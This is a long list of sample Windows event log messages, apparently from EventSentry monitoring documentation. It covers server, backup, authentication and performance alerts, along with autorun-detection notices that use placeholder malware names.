Message:
Unable to initialize the Microsoft Exchange Information Store service. - Error 0x80004005.
Message:
Congratulations! You have just installed and setup up EventSentry (on host TEST3-W2K), which we believe to be the most efficient and economic event log and system monitoring application on the market.
Please visit http://www.eventsentry.com or http://www.netikus.net/ for more information on EventSentry.
Thank you for using EventSentry.
Message:
Error 0x80004005 connecting to the Microsoft Active Directory
Message:
Successful Logon:
User Name: <user name>
Domain: <domain name>
Logon ID: <logon identifier>
Logon Type: <logon type>
Logon Process: <logon process>
Authentication Package: <package name>
Workstation Name: <computer name>
Message:
Connection to the Microsoft Exchange Server has been restored
Source:
Application Error
Message:
Faulting application test.exe, version 1.00.0.400, faulting module test.exe, version 1.00.0.400, fault address 0x00031112.
Message:
A new process has been created:
New Process ID: 860
Image File Name: calc.exe
Creator Process ID: 3492
User Name: MyUser
Domain: NETIKUS
Logon ID: (0x0,0x87F44D2)
Message:
Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
Message:
TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts.
Message:
Failed to connect to server
Message:
The 'ESE API' returned 'Unable to perform the operation. Either you can not connect to the specified server
or the service you are trying to connect to is not running.
' from a call to 'HrESEBackupRestoreNodes()' additional data ''
Message:
The session setup from the computer ComputerName failed to authenticate. The name of the account referenced in the security database is AccountName$.
The following error occurred:
Access is denied.
Message:
3041 :
BACKUP failed to complete the command BACKUP LOG [DATABASE] TO DISK = N'E:\Microsoft SQL Server\MSSQL\BACKUP\DatabaseLog.backup' WITH INIT , NOUNLOAD , NAME = N'Database Transaction Log Backup', NOSKIP , STATS = 10, NOFORMAT
Message:
Microsoft (R) Windows (R) 5.02. 3790 Multiprocessor Free.
Message:
The system uptime is 10045 seconds.
Message:
The device, \Device\ScsiPort0, did not respond within the timeout period.
Message:
The driver detected a controller error on Device\ScsiPort0.
Message:
A parity error was detected on [device name].
Message:
The firmware update, Version 4.09 P29-09/15/2004, contains critical bug fixes and is the minimum version required. Please perform the update at your earliest convenience. Click on the underlined Version to view more details on the fixes.
Fixes
ProLiant DL380 G3 ROM P29 (09/15/2004)
Updated to integrate the latest Intel processor support code into the System ROM. This works around an issue with the Intel Xeon processor that could cause unexpected behavior or system hang.
Source:
Internet Explorer
Message:
The '..' characters are not allowed in the Path parameter for the MapPath method
Message:
The event description will show any message received through the syslog protocol
Message:
Adapter Intel(R) PRO/100 VE Network Connection: Did not receive auto-negotiation advertisement from link partner. A full duplex connection may be available.
Message:
The user xxx\xxx failed an authentication attempt due to the following reason: The user could not be authenticated using Challenge Handshake Authentication Protocol (CHAP). A reversibly encrypted password does not exist for this user account. To ensure that reversibly encrypted passwords are enabled, check either the domain password policy or the password settings on the user account.
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Message:
The kerberos subsystem encountered a PAC verification failure. This indicates that the PAC from the client computername$ in realm DOMAIN.LOCAL had a PAC which failed to verify or was modified. Contact your system administrator.
Message:
The kerberos subsystem is having problems fetching tickets from your domain controller using the UDP network protocol. This is typically due to network problems. Please contact your system administrator.
Source:
Internet Explorer
Message:
/projectserver/Library/pjquery.asp, line 658
Source:
Application Management
Message:
MSI Error - 2755 -
Failed to apply changes to software installation settings. Software changes could not be applied. A previous log entry with details should exist. The error was : The Temp folder is on a drive that is full or is inaccessible. Free up space on the drive or verify that you have write permission on the Temp folder.
Message:
The RDP protocol component "DATA ENCRYPTION" detected an error in the protocol stream and has disconnected the client.
Message:
An unknown error occurred while processing the current request: Exception of type Microsoft.Exchange.OMA.DataProviderInterface.ProviderException was thrown.
Stack trace:
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
at System.Web.SessionState.SessionStateModule.CompleteAcquireState()
at System.Web.SessionState.SessionStateModule.BeginAcquireState(Object source, EventArgs e, AsyncCallback cb, Object extraData)
at System.Web.AsyncEventExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
Inner Error: Exception has been thrown by the target of an invocation.
Stack trace:
at System.Reflection.RuntimeConstructorInfo.InternalInvoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture, Boolean isBinderDefault)
at System.Reflection.RuntimeConstructorInfo.Invoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
at System.RuntimeType.CreateInstanceImpl(BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at System.Activator.CreateInstance(Type type, BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
Inner Error: The remote server returned an error: (403) Forbidden.
Stack trace:
at Microsoft.Exchange.OMA.ExchangeDataProvider.OmaWebRequest.GetRequestStream()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices.GetSpecialFolders()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices..ctor(UserInfo user)
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Message:
18272 :
I/O error on backup or restore restart-checkpoint file 'C:\Program Files\Microsoft SQL Server\MSSQL$BKUPEXEC\backup\model4IDR.ckp'. Operating system error 3(error not found). The statement is proceeding but is non-restartable.
Message:
Referral Interface cannot contact any Global Catalog that supports the NSPI Service. Clients making RFR requests will fail to connect until a Global Catalog becomes available again. After a Domain Controller is promoted to a Global Catalog, it must be rebooted to support MAPI Clients.
Message:
When performing a RSOP to a remote computer you get: You do not have permission to perform this operation. Access is denied.
Source:
Microsoft Operations Manager
Message:
The MOM Server failed to install agent on remote computer xxxx-cb00.xxxx.local.
Error Code: -2147024891
Error Description: Access is denied.
Microsoft Installer Error Description: No Description Available
Source:
MOM Operator Console
Message:
The response processor failed to execute a response. The response returned the error message: The remote procedure call failed.
Response Details:
Rule ID: {xxx-xxx-xx-x-x-x-x-x}
Response description: script: bla
Time of Last Event: 1/14/2005 8:32:42 AM
Time Raised: 1/14/2005 8:32:33 AM
Rule Name: The rule response failed to execute
Modified By: NT AUTHORITY\NETWORK SERVICE
Message:
Windows cannot access the file gpt.ini for GPO CN=31B2F340-016D-11D2-945F-00C04FB984F9,CN=Policies,CN=System,DC=xxxx,DC=local. The file must be present at the location <\\xxxx.local\sysvol\xxxx.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\gpt.ini>. (Configuration information could not be read from the domain controller, either because the machine is unavailable, or access has been denied. ). Group Policy processing aborted.
Message:
An unknown error occurred while processing the current request:
Message: The remote server returned an error: (403) Forbidden.
Source: Microsoft.Exchange.OMA.ExchangeDataProvider
Stack trace:
at Microsoft.Exchange.OMA.ExchangeDataProvider.OmaWebRequest.GetRequestStream()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices.GetSpecialFolders()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices..ctor(UserInfo user)
Message: Exception has been thrown by the target of an invocation.
Source: mscorlib
Stack trace:
at System.Reflection.RuntimeConstructorInfo.InternalInvoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture, Boolean isBinderDefault)
at System.Reflection.RuntimeConstructorInfo.Invoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
at System.RuntimeType.CreateInstanceImpl(BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at System.Activator.CreateInstance(Type type, BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
Message: Exception of type Microsoft.Exchange.OMA.DataProviderInterface.ProviderException was thrown.
EventMessage:
UserMessage: A System error has occurred while processing your request. Please try again. If the problem persists, contact your administrator.
Source: Microsoft.Exchange.OMA.UserInterface
Stack trace:
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
at System.Web.SessionState.SessionStateModule.RaiseOnStart(EventArgs e)
at System.Web.SessionState.SessionStateModule.CompleteAcquireState()
at System.Web.SessionState.SessionStateModule.BeginAcquireState(Object source, EventArgs e, AsyncCallback cb, Object extraData)
at System.Web.AsyncEventExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
Message:
The 'Active Directory' returned 'A disk I/O error occurred.
' from a call to 'BackupTruncateLogs()' additional data '-'.
Message:
The data portion of event 19002 from MSSQLSERVER is invalid.
Message:
Spam rules update error (CopyFile, dwError = 32) (Error code 0x80041F04) occurred.
Message:
Event Type: Warning
Event Source: NtFrs
Event Category: None
Event ID: 13565
Date: 10.03.2005
Time: 18:09:24
User: N/A
Computer: xxxx
Description:
File Replication Service is initializing the system volume with data from another domain controller. Computer XXXX-CB01 cannot become a domain controller until this process is complete. The system volume will then be shared as SYSVOL.
To check for the SYSVOL share, at the command prompt, type:
net share
When File Replication Service completes the initialization process, the SYSVOL share will appear.
The initialization of the system volume can take some time. The time is dependent on the amount of data in the system volume, the availability of other domain controllers, and the replication interval between domain controllers.
Message:
The data buffer created for the "MSExchangeIS" service in the "C:\Program Files\Exchsrvr\bin\mdbperf.dll" library is not aligned on an 8-byte boundary. This may cause problems for applications that are trying to read the performance data buffer. Contact the manufacturer of this library or service to have this problem corrected or to get a newer version of this library.
Source:
Service Control Manager
Message:
The Microsoft Exchange Routing Engine service failed to start due to the following error:
The executable program that this service is configured to run in does not implement the service.
Message:
The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
0C0A3666-30C9-11D0-8F20-00805F2CD064
to the user BULL\IWAM_BULL SID (BULL\IWAM_BULL). This security permission can be modified using the Component Services administrative tool.
Source:
Service Control Manager
Message:
The Microsoft Exchange Information Store service terminated with service-specific error 0 (0x0).
Message:
The Security System could not establish a secured connection with the server DNS/lyra.u.arizona.edu. No authentication protocol was available
Message:
WLBS : host 1 does not have the same number or type of port rules as this host. Please check WLBS Setup dialog on all machines that belong to the cluster and make sure that they all contain the same number and the same type of port rules.
Message:
The status for service HTTPFilter (HTTP SSL) changed from Stopped to Running.
Message:
Automatic certificate enrollment for local system failed to enroll for one Enrollment Agent (Computer) certificate (0x80094012). The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
Source:
MSExchangeTransport
Message:
The categorizer is unable to categorize messages due to a retryable error.
Message:
Logon Failure:
Reason: The user has not been granted the requested
logon type at this machine
User Name: %1
Domain: %2
Logon Type: %3
Logon Process: %4
Authentication Package: %5
Workstation Name: %6
Message:
The IP address lease %1 for the Network Card with network address %2 has been denied by the DHCP server %3 (The DHCP Server sent a DHCPNACK message).
Message:
The shell stopped unexpectedly and %1 was restarted.
Source:
Service Control Manager
Message:
The PfModNT service failed to start due to the following error:
The system cannot find the file specified.
Message:
Printer Canon Bubble-Jet BJC-85 (from RACOON) is pending deletion.
Message:
EventSentry was unable to query the local audit policy settings. A call to open the LSA policy failed with error Access is denied.. Please see the EventSentry documentation for troubleshooting advice on this problem.
Message:
The Windows Firewall has detected an application listening for incoming traffic.
Name: -
Path: C:\WINDOWS\system32\svchost.exe
Process identifier: 1160
User account: SYSTEM
User domain: NT AUTHORITY
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 68
Allowed: No
User notified: No
Message:
{Delayed Write Failed} Windows was unable to save all the data for the file \Device\LanmanRedirector. The data has been lost. This error may be caused by a failure of your computer hardware or network connection. Please try to save this file elsewhere.
Message:
The "\\SERVER\SophosSBE\" library update task has failed. INDEX 0x8000ffff
Update failed. Parent could not be accessed. Check the parent address/path and access settings. INDEX 0x8000ffff
Could not read the EM Library database. MCID 0x80040403
Could not open requested resource "/update/index/00000000.db". VFS 0x80040403
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Failed to make a connection. VFS 0x80040407
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Could not open requested resource "/update/index/db.inf". VFS 0x80040403
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Source:
Service Control Manager
Message:
The ServiceABC service terminated unexpectedly. It has done this 3 time(s). The following corrective action will be taken in 0 milliseconds: No action.
Message:
The Security Account Manager failed a KDC request in an unexpected way. The error is in the data field. The account name was username@MYDOMAIN.LOCAL and lookup type 0x28.
Message:
An error occurred during a scheduled backup of drive I:\.
Error EA39070A: The internal structure of the PQI file is invalid or unsupported.
Details: 0xEA39070A
Source: Norton Ghost 9.0
Source:
Active Server Pages
Message:
Error: The Template Persistent Cache initialization failed for Application Pool 'DefaultAppPool' because of the following error: Could not create a Disk Cache Sub-directory for the Application Pool. The data may have additional error codes..
Message:
An infected file has been found.
Message:
Begin Backup of 'SERVER\Microsoft Information Store\First Storage Group' Verify: Off Mode: Append Type: Normal
Message:
End Backup of 'SERVER\Microsoft Information Store\First Storage Group' Verify: Off Mode: Append Type: Normal
Message:
Unable to connect to SMTP host email.company.com due to error 'Unable to establish TCP connection (10065). If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.
Message:
The process notification (target) "My Process" successfully executed the process "c:\batch\backup.cmd".
Message:
The process notification (target) "MyProcess" was unable to execute the process "c:\batch\mybatchfile.cmd" due to error 5.
Message:
User DOMAIN\User has successfully connected to host REMOTE from host LOCAL with the EventSentry management application.
Message:
When monitoring the Application event log, the EventSentry agent missed events between number 980 to 984. EventSentry will attempt to read those events at a later time to make sure that all events from the Application log are being processed.
Message:
The EventSentry agent has successfully adjusted the permissions of the configuration registry key HKLM\Software\netikus.net\EventSentry. 3 ACE entries (one of the following: Users, Power Users, Everyone) were removed to increase security.
Message:
Time Provider NtpClient: This machine is configured to use the domain hierarchy to determine its time source, but it is the PDC emulator for the domain at the root of the forest, so there is no machine above it in the domain hierarchy to use as a time source. It is recommended that you either configure a reliable time service in the root domain, or manually configure the PDC to synchronize with an external time source. Otherwise, this machine will function as the authoritative time source in the domain hierarchy. If an external time source is not configured or used for this computer, you may choose to disable the NtpClient.
Message:
The browser was unable to retrieve a list of servers from the browser master \\DC on the network \Device\NetBT_Tcpip_631A8496-9308-4979-9849-............ The data is the error code.
Message:
Replication of license information failed because the License Logging Service on server <Server> could not be contacted.
Message:
No Windows NT or Windows 2000 Domain Controller is available for domain Domain. The following error occurred:
There are currently no logon servers available to service the logon request.
Message:
Unable to read local eventlog (reason: The data area passed to a system call is too small).
Message:
The EventSentry service could not start because of a configuration error. Please make sure that you have at least one filter and target or the syslog daemon configured.
Message:
Error during SMTP communication with SMTP host %1. After sending "%2" the following error occurred: %3.
Message:
Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.
Message:
Unable to open parallel port LPTx. Please make sure that no application is currently using this printer port, also make sure that no printer is using port LPTx. You might have to restart the service after the resource conflict is solved.
Message:
Unable to start service because no valid license was found.
Message:
The configuration for the agent (service) was successfully re-read from the registry.
Message:
The custom event log MyCustomLog is not configured on this system. You will not be able to monitor this event log on this system. The service (agent) will continue to run without interruption.
Message:
The temporary file %1 has been found but no filter referencing this target (%2) is configured for a summary notification. The file has been deleted.
Message:
The following service was added: UtilMan (Utility Manager). Current service state is Stopped, service is using binary file C:\WINNT\System32\UtilMan.exe.
Message:
Replication of license information failed because the License Logging Service on server <PDC servername> could not be contacted.
Message:
The following x service(s) are configured to AUTOSTART but are currently not running:
Cdaudio
Changer
CD-Burning Filter Driver
lbrtfdc
mrtRate
PCIDump
Sfloppy
Security Center
Message:
Product: J2SE Runtime Environment 5.0 Update 4 -- Installation failed.
Message:
Automatic certificate enrollment for local system failed to contact the active directory (0x8007054b). The specified domain either does not exist or could not be contacted.
Enrollment will not be performed.
Source:
MSExchangeIS Public Store
Message:
user@domain.com failed an operation on folder /O=ORG/OU=FIRST ADMINISTRATIVE GROUP/CN=RECIPIENTS/CN=OAB VERSION 3AD24215E446FED006D7E903A387A01BE4002721 on database "First Storage Group\Public Folder Store (SERVER)" because the user did not have the following access rights:
'Delete' 'Read Property' 'Write Property' 'Create Message' 'View Item' 'Create Subfolder' 'Write Security Descriptor' 'Write Owner' 'Read Security Descriptor' 'Contact'
The entry ID of the folder is in the data section of this event.
Message:
DS lookup for user [USERNAME], connecting from 10.10.10.1, failed with error 0x80040920.
Message:
Authentication attempt from 10.10.10.1 to [USERNAME] has failed with error 0x52e.
Message:
Error reading log event record. Handle specified is %d. Return code from ReadEventLog is 122.
Message:
Backup Exec Alert: Job Failed(Server:
Message:
Application UserFaultCheck (%systemroot%\system32\dumprep 0 -u) was removed from the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and will no longer be run when a user logs into the system.
Message:
Object Open: Object Server: SC Manager Object Type: SERVICE OBJECT Object Name: RemoteAccess New Handle ID: - Operation ID: {0,840128961} Process ID: 416 Primary User Name: CLMTS001$ Primary Domain: ATSC Primary Logon ID: (0x0,0x3E7) Client User Name: e010421 Client Domain: ATSC Client Logon ID: (0x0,0x32125658) Accesses Query status of service Privileges -
Message:
Failed to connect to server. Error: 0x800401F0
Message:
The system failed to flush data to the transaction log. Corruption may occur.
Message:
Failed to setup initiator portal. Error status is given in the dump data.
Message:
wuaueng.dll (620) SUS20ClientDataStore: A request to write to the file
Message:
Adapter 1: Battery Voltage LOW.
Source:
Application Management
Message:
The assignment of application Command AntiVirus for Windows Enterprise from policy Command AV failed. The error was: The group policy framework should call the extension in the synchronous foreground policy refresh.
Source:
Application Management
Message:
The install of application "application name" from policy "policy name" failed. The error was : The installation source for this product is not available. Verify that the source exists and that you can access it.
Message:
Unexpected error 0x8004010f occurred in
Message:
Active Directory attempted to perform a remote procedure call (RPC) to the following server. The call timed out and was cancelled.
Server:
6d0f4d18-521c-4429-8d8e-06faf22b4f57._msdcs.ds.han.xx
Call Timeout (Mins):
5
Thread ID:
fcc
Additional Data
Internal ID:
5001047
Message:
Unable to read the disk performance information from the system. Disk performance counters must be enabled for at least one physical disk or logical volume in order for these counters to appear. Disk performance counters can be enabled by using the Hardware Device Manager property pages. Status code returned is data DWORD 0.
Message:
Backup Exec Alert: Tape Alert Warning
(Server: "FILE") (Job: "Company - Differential Slot 6") Warning - Library security has been compromised.
Robotic Library for Device: DELL 3
Message:
Backup of data protection master key.
Key Identifier: ab7287ab-974d-4dc7-aaaa-91e0bc96642e
Recovery Server:
Recovery Key ID:
Failure Reason: 0x3A
Message:
Object Open: Object Server: Security Object Type: File Object Name: \Device\NetbiosSmb Handle ID: - Operation ID: {0,1502291133} Process ID: 1144 Image File Name: C:\WINDOWS\system32\svchost.exe Primary User Name: LOCAL SERVICE Primary Domain: NT AUTHORITY Primary Logon ID: (0x0,0x3E5) Client User Name: - Client Domain: - Client Logon ID: - Accesses: SYNCHRONIZE ReadData (or ListDirectory) WriteData (or AddFile) Privileges: - Restricted Sid Count: 0 Access Mask: 0x100003
Message:
The status for service WmiApSrv (WMI Performance Adapter) changed from Running to Stopped.
Message:
Kan het registerbestand niet verwijderen. Als u een zwervend profiel hebt, worden uw instellingen niet gerepliceerd. Neem contact op met de systeembeheerder.
Details: Toegang geweigerd. , buildnummer ((2195)).
Message:
Time Stamp 12/31/05 18:59:05 Event Number 908 Severity Error Host CX300_SPB Storage Array APM00050506804 SPB Device SP B Description Fault - Cache Disabling
Message:
The service mouhid (Mouse HID Driver) is now being monitored. Current service status is Running.
Message:
The following service was added: APC UPS Service (APC UPS Service). Current service state is Running, service is using binary file C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe.
Message:
The following service was removed: APC UPS Service (APC UPS Service). Last service state was Running.
Message:
The service Abiosdsk (Abiosdsk) will not be monitored anymore. Last service status was Stopped.
Message:
"c:\batch\db_upd.cmd" was run for 381 seconds with the result shown below. Return Code was 0.
Downloading file ...
Dropping existing tables ...
Decompressing download file ...
Importing SQL data ...
Done.
Message:
The process "c:\batch\update.cmd" could not be created due to the following error:
The system cannot find the path specified.
Message:
The process superdel.exe exceeded the maximum allowed time interval of 15 minute(s). EventSentry was unable to terminate the process due to the following error: Acess Denied.
Message:
The process C:\temp\vnc-4_1_1-x86_win32.exe exceeded the maximum allowed time interval of 1 minute(s). The process was terminated. Please increase the timeout interval for this process in the management application (System Health -> Application Scheduler).
Message:
The Application event log was successfully cleared.
Message:
The shortcut PerformanceEnhancer.lnk (using file C:\Windows\evilvirus.exe) registered itself in the directory C:\Documents and Settings\All Users\Start Menu\Programs\Startup and will be automatically run when a user logs into the system.
Message:
The Application event log was successfully backed up to file C:\EVENTLOG BACKUP\APPLICATION_ 2005_08_18.EVT.
Message:
The Security event log was successfully cleared and backed up to file V:\CENTRAL EVENT LOG BACKUP\WHALE_SECURITY_08022006_1400.EVT.
Message:
The Security event log could not be cleared due to the following error: Access is Denied.
Message:
The Application event log could not be backed up to file C:\BACKUP\ESLOG\BULL_09022006.EVT due to the following error:
Cannot create a file when that file already exists.
Message:
The System event log could not be cleared and backed up due to the following error: Access is Denied.
Message:
Full event logs cannot be detected on this machine, this feature is not supported on this platform (only Windows 2000 or higher).
Message:
The process explorer.exe (PID 828) seems to be leaking "Working Set" memory. If you keep seeing this message in the event log then it is recommended that you monitor the memory consumption of this process closely with performance monitor if you have not already done so.
The process is currently using 5738496 bytes of "Working Set" memory, system memory load is 87%.
If you are certain that this process is not leaking memory then you can exclude this process from being monitored or change the monitoring parameters (contact support@netikus.net for more information) in the registry. If this process is leaking memory then contact the manufacturer of the application for support.
Message:
The process eventsentry_gui.exe is not active.
Message:
Free disk space for drive V:\ is below the configured limit of 4 percent. 3.31 percent of disk space (985 Mb) are currently available on drive V:\.
Message:
Free disk space for drive C:\ is below the configured limit of 500 Mb. 152 Mb of disk space are currently available on drive C:\.
Message:
Application NTToolkit was installed.
Additional Information:
Publisher: NETIKUS.NET ltd
Installation Directory: C:\Program Files\NTToolkit
Version: 1.91
Message:
Application NToolkit (NTToolkit) was uninstalled.
Message:
Application QuickTime Task ("C:\Program Files (x86)\QuickTime\qttask.exe" -atboottime) registered itself in the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and will be automatically run when a user logs into the system.
Message:
The registry value AppInit_DLLs in key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows changed from "" to "wbsys.dll". All files specified in this value will be automatically run when a user logs into the system.
Message:
The application eraseallfiles.exe registered itself in the directory c:\Documents and Settings\All Users\Start Menu\Programs\Startup and will be automatically run when a user logs into the system.
Message:
The shortcut PerformanceEnhancer.lnk (using file C:\windows\evilvirus.exe) was removed from directory C:\Documents and Settings\All Users\Start Menu\Programs\Startup and will no longer run when a user logs into the system.
Message:
Application YourPersonalAdware.exe was added to the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup and will be automatically run when the system boots.
Message:
Application YourPersonalAdware.exe was removed from the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup and will no longer be run the system boots.
Message:
The application >26923b43-4d38-484f-9b9e-de460746276c registered file %systemroot%\system32\shmgrate.exe OCInstallUserConfigIE in registry key SOFTWARE\Microsoft\Active Setup\Installed Components and might be automatically run when a user logs into the system. Please see the help file (search for ACTIVE SETUP) for more information.
Message:
There were password errors using the Credential Manager. To remedy, launch the Stored User Names and Passwords control panel applet, and reenter the password for the credential DOMAIN\myadmin.
Message:
Application >60B49E34-C7CC-11D0-8953-00A0C90347FF (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.
Message:
There was an error (999) monitoring registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components. Please restart the EventSentry agent or notify NETIKUS.NET support if this problem persists. Autorun monitoring will NOT continue.
Message:
VMware process did not start properly.
Message:
The explorer extension DLL SecretMalwareDLL (using file ieatfiles.dll) was removed from the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify and will no longer be loaded into explorer.exe.
Category:
Performance Monitoring
Message:
The performance counter "Memory\Available MBytes" fell below the threshold of 10, the current average is 9.
Category:
Performance Monitoring
Message:
The performance counter "%1" (instance "%2") fell below the threshold of %3, the current average is %4.
Category:
Performance Monitoring
Message:
The performance counter "%1" equals the threshold of %2.
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\Thread Count" (instance "myapp") equals the threshold of 20.
Category:
Performance Monitoring
Message:
The performance counter "%1" exceeded the threshold of %2, the current average is %3.
Category:
Performance Monitoring
Message:
The performance counter %1 (instance %2) exceeded the threshold of %3, the current average is %4.
Message:
The group alert "Performance Warning" was triggered because all performance counters of this group reported an alert the last time they were checked. Please see below for a list of all performance counters and the data last reported:
Low Memory: 120 (17 seconds ago)
High Paging Activity: 250 (0 seconds ago)
Category:
Performance Monitoring
Message:
One or more required function entry points could not be found in the dynamic link library PDH.DLL. Please make sure that the latest version of PDH.DLL is installed on this machine, for example you may copy the DLL from another machine running a later Operating System. Performance monitoring cannot continue.
Category:
Performance Monitoring
Message:
The performance counter %1 is back above the threshold of %2, the current average is %3.
Category:
Performance Monitoring
Message:
The performance counter "%1" (instance "%2") is back above the threshold of %3, the current average is %4.
Category:
Performance Monitoring
Message:
The performance counter "%1" is back below the threshold of %2, the current average is %3.
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\% Processor Time" (instance "mysqld-nt") is back below the threshold of 50, the current average is 48.
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\% Processor Time" (instance "SWEEPSRV.SYS") which previously exceeded the configured threshold, is not available anymore and will not be monitored.
Message:
Congratulations! You have just installed and setup up EventSentry (on host BLACKMAMBA), which we believe to be the most efficient and economic event log and system monitoring application on the market.
Please visit http://www.eventsentry.com or http://www.netikus.net/ for more information on EventSentry.
Thank you for using EventSentry.
Message:
Unable to connect to SMTP host %1 due to error "%2". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.
Message:
Error during SMTP communication with SMTP host %1. After sending "%2" the following error occurred: %3
Message:
Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.
Message:
The process notification (target) %1 successfully executed the process "%2".
Message:
The process notification (target) Laser Printer was unable to execute the process ""cscript.exe" c:\temp\dosprint\eventprint.vbs "Security" "Audit Success" "Security" "Detailed Tracking" 592 "NETIKUSNET\sang.kim" "BULL" "2/22/2006 1:03:33 PM" " " due to error 2.
Message:
EventSentry was unable to connect to the ODBC target "Test ODBC" due to error "OdbcExpandError: [28000] [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'eventsentry_svc'. (18456)". EventSentry will queue events and continue to attempt the delivery of events.
Message:
The following error occurred while trying to read the "%1" event log: "%2". In most cases the only way to resolve this problem is to save (if possible) and clear the %1 event log. EventSentry will not be able to monitor the %1 event log until this problem is resolved.
Message:
Unable to start service because the End User License Agreement was not accepted
Message:
The session setup from the computer WLBS1 failed to authenticate. The name(s) of the account(s) referenced in the security database is WLBS1$. The following error occurred:
Access is denied.
Message:
The EventSentry agent has successfully changed the buffer size from %1 bytes to %2 bytes after the Operating System returned the following error: "The data area passed to a system call is too small".
Message:
The state of service %1 was Stopped, requested state is Running. EventSentry successfully changed the service status to Running.
Message:
The state of service Spooler is Stopped, requested state is Running. EventSentry was not able to change the service status due to the following error: An instance of the service is already running.
Message:
The process calc.exe is active.
Message:
Trend analysis has determined unusual high disk usage on drive %1. The average recorded trend on drive %1 was %2 kb, the current trend was %3 kb, an increase of %4%%.
If this trend change is expected (for example, caused by a daily backup routine) then you will see this message two more times before the pattern is recognized. With the recorded trend, disk space will be exhausted in %5 days, with the current trend in %6 days.
Message:
Event log filter Test exceeded the configured threshold (3 entries / 300 second(s)). 3 events (out of a total of 8) were dropped by this filter. You can review the dropped events in the event log (if the size of the event log is big enough).
Message:
Event log filter Test has reached the configured threshold (3 entries / 60 second(s)).
Message:
Event log filter Test has reached the configured threshold (3 entries / 300 second(s)). Events matching this filter will now be processed.
Message:
Event log filter Threshold has reached or exceeded the configured threshold (1 entries / 60 second(s)). 5 events were processed during the interval.
Message:
No event matching filter Backup OK has occurred in the event log in the configured time period. According to the schedule, at least one event matching filter Backup OK should have been logged during the last 420 minutes.
Message:
The browser was unable to retrieve a list of servers from the browser master \\DC1-W2K3 on the network \Device\NetBT_Tcpip_631A8496-9308-4979-9849-02D1CAB6CF0A. The data is the error code.
Message:
EventSentry was unable to query the local audit policy settings. A call to query the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.
Message:
EventSentry has determined that the currently active Audit Policy does not audit "Process Tracking" and EventSentry is NOT configured to activate "Process Tracking". You will either need to activate Process tracking manually by launching "Start -> Programs -> Administrative Tools -> Local Security Settings -> Local Policies -> Audit Policy -> Audit %3 = Audit Success", activate %2 tracking in Active Directory or configure EventSentry to activate "Process Tracking" for you.
Message:
EventSentry determined that "Process Tracking" is currently not enabled and was unable to activate it. A call to change the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.
Message:
The RDP protocol component X.224 detected an error in the protocol stream and has disconnected the client.
Message:
The Security System has received an authentication request that could not be decoded. The request has failed.
Message:
WINS received a packet that has the wrong format. For example, a label may be More than 63 octets.
Message:
The length of the message sent by another WINS indicates a very big message. There may have been corruption of the data. WINS will ignore this message, terminate the connection with the remote WINS, and continue.
Message:
A RADIUS message was received from the invalid RADIUS client IP address 192.168.6.60.
Message:
The KDC received invalid messages of type changepassword.
Message:
